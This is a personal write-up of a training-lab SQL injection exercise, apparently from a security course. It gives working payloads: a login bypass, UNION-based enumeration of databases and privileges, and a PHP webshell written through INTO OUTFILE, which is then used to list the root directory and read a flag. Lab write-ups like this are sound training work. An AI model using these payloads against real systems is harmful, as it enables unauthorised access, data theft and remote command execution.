Presented with a login page immediately should have us checking to see if we can work around this. First we want to test if we have a first order or second order SQLi
seeing a login and based on the module going over the logins I feel the urge to attack it with the following:
' OR '1'='1'; --
Before I do though what we want to know is if this is passing data through the URL or another method. if it is passing data through the URL then we will want to possibly encode our injection.
After passing a simple single quote I get the following:
We can see that we are not passing data through the URL so we will want to force a TRUE value to let us get past this gate. to do this we do the following:
' OR '1'='1'; --
If for some reason you are coming across this and you are not me… or actually even if you are me. if this confuses you then you should really refresh on the module around it.
Now we are presented with the following page:
Similar to what we saw in the modules where we grabbed data back. If we recalled and our notes were solid our first step should be playing around with the search to find a currect value to pass it followed by finding out how many columns this table returns.
We can do this with ORDER BY
or with UNION
do to ease I am going to use Union
Playing around I found out that January
was a passable parameter and followed it with this query
January' UNION SELECT 1,2,3,4,5,6; -- -
note: the final - is to represent I added a space
what we are doing here is adding a correct parameter, closing it with a single quote and having a union to see if we meet the same amount of columns back, ending the query with the semicolon and commenting out the rest of the query if there is one.
What we get back is the following:
Success! This query works we just need to lower the amount of columns until we succeed. I started with six since there were 4 just to make sure we didn’t have to go up.
Next i try the following query:
January' UNION SELECT 1,2,3,4,5; -- -
Note: final dash is to show we are using a space.
Success! we now can see our table starting at 2 most likely do to the return omitting the key column. Picture below:
From here it would be best practices to see what kind of DB we are on and we can do that in a multitude of ways. However, we already know we are on a Maria DB server due to errors we saw so we will skip this step.
the next step then should be to see what databases we have access to. We can do this by replacing one of the numbers with a dot notation by doing the following command:
Note: final - is to show there is a space
We get the following from our query:
Looks like we have two databases worth something. ilfreight
and backup
Now I would assume we are in the ilfreight
database but you never know. So lets see what database we are in.
lets do this by altering the query we had above with database()
We see we are indeed in the ilfreight
What we are doing is not necessarily needed but its good practice regardless.
Now that we know what databases exist and what database we are currently in we could see what tables and columns live in these databases but I am going to skip this step and go straight to seeing not who our user is but to see what our privileges are. If we don’t have the right privileges we will go back.
January' UNION SELECT 1,super_priv,3,4,5 FROM mysql.user;-- -
With this query we get back the following response:
The Y
indicates we have super privileges.
Since my kids are getting restless of me writing this and doing the lab at the same time I am going to get straight to making the webshell
January' union select "",'<?php system($_REQUEST[0]); ?>', "", "", "" into outfile '/var/www/html/shell.php';-- -
OH NOOOOOOOOO. I was denied the ability to write a file as we can see below:
After looking over and seeing we are the root@localhost I was a bit puzzled unilt I noticed the URL. we are in /dashboard directory? So what if we tried to make our webshell in that directory instead?
January' union select "",'<?php system($_REQUEST[0]); ?>', "", "", "" into outfile '/var/www/html/dashboard/shell.php';-- -
No errors! I am guessing this means it worked! Lets see if we can output what is in the root directory.
since we want to pass cd /;ls
we will url encode it to make it work so our URL should look like the following:
looks like we have found our flag! flag_cae1dadcd174.txt
now lets cat it out by running cd /; cat flag_cae1dadcd174.txt
URL encoding to make our url as follows:
Success! we now have the flag we need to pass.